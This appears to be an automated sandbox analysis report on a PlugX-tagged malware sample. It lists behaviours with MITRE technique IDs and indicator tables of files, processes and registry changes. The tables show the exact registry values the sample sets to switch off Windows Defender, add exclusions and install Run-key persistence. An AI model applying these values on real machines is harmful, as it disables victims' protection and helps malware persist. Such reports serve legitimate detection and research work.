plugx | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Qitucuxyno.exe

Loads dropped DLL 64 IoCs

pid	Process
1924	Install2.tmp
5024	installer.exe
5024	installer.exe
5024	installer.exe
4108	MsiExec.exe
4108	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
5024	installer.exe
4468	MsiExec.exe
4468	MsiExec.exe
4468	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
5612	MsiExec.exe
4468	MsiExec.exe
5328	rundll32.exe
4492	main.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
6112	toolspab1.exe
5988	42a25820.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
4420	rundll32.exe
6052	rundll32.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
1496	SunLabsPlayer.exe
368	lighteningplayer-cache-gen.exe
368	lighteningplayer-cache-gen.exe
368	lighteningplayer-cache-gen.exe
368	lighteningplayer-cache-gen.exe
368	lighteningplayer-cache-gen.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 12 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	CECD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ogdtzM = "0"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	CECD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	CECD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\CECD.exe = "0"	CECD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	CECD.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Nuzhecidimae.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
57	ip-api.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\440TPW7W.cookie	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent ACBDFD1D0CFC97FF	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\ogdtzM	svchost.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 7E5DF847A44E7DB4	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\440TPW7W.cookie	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs

pid	Process
4492	main.exe
4492	main.exe
4492	main.exe
4492	main.exe
4492	main.exe
4492	main.exe
4492	main.exe
4492	main.exe
1924	parse.exe
3784	parse.exe
5320	parse.exe
3784	parse.exe
5320	parse.exe
1924	parse.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe
4836	CECD.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1808 set thread context of 4588	1808	svchost.exe	122
PID 5744 set thread context of 6112	5744	toolspab1.exe	160
PID 5536 set thread context of 3696	5536	675.exe	186
PID 4520 set thread context of 4964	4520	svgesfv	236
PID 4836 set thread context of 936	4836	CECD.exe	248
PID 4656 set thread context of 5404	4656	svgesfv	258
PID 5312 set thread context of 4580	5312	svgesfv	267

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-FNH57.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 36 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\f747843.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8EE0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9CF2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F6A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9B6A.tmp	msiexec.exe
File created	C:\Windows\Installer\f747846.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7FA8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI948F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9DA2.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI8279.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI978E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI97FD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D12.tmp	msiexec.exe
File created	C:\Windows\Installer\f747843.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8CFB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D72.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI7ECD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI97BE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7A27.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI80E2.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9DC2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7E10.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8430.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9123.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D42.tmp	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
2732	5592	WerFault.exe	187
5036	5592	WerFault.exe	187
5004	5592	WerFault.exe	187
5732	5592	WerFault.exe	187
4188	5592	WerFault.exe	187
4396	4836	WerFault.exe	239

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bsgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svgesfv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2412	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3808	bitsadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3840	taskkill.exe
5844	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 37 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}User	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{02EBD91E-0779-43B6-91A5-9A92C06000D3}USER	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{02EBD91E-0779-43B6-91A5-9A92C06000D3}Machine	rundll32.exe

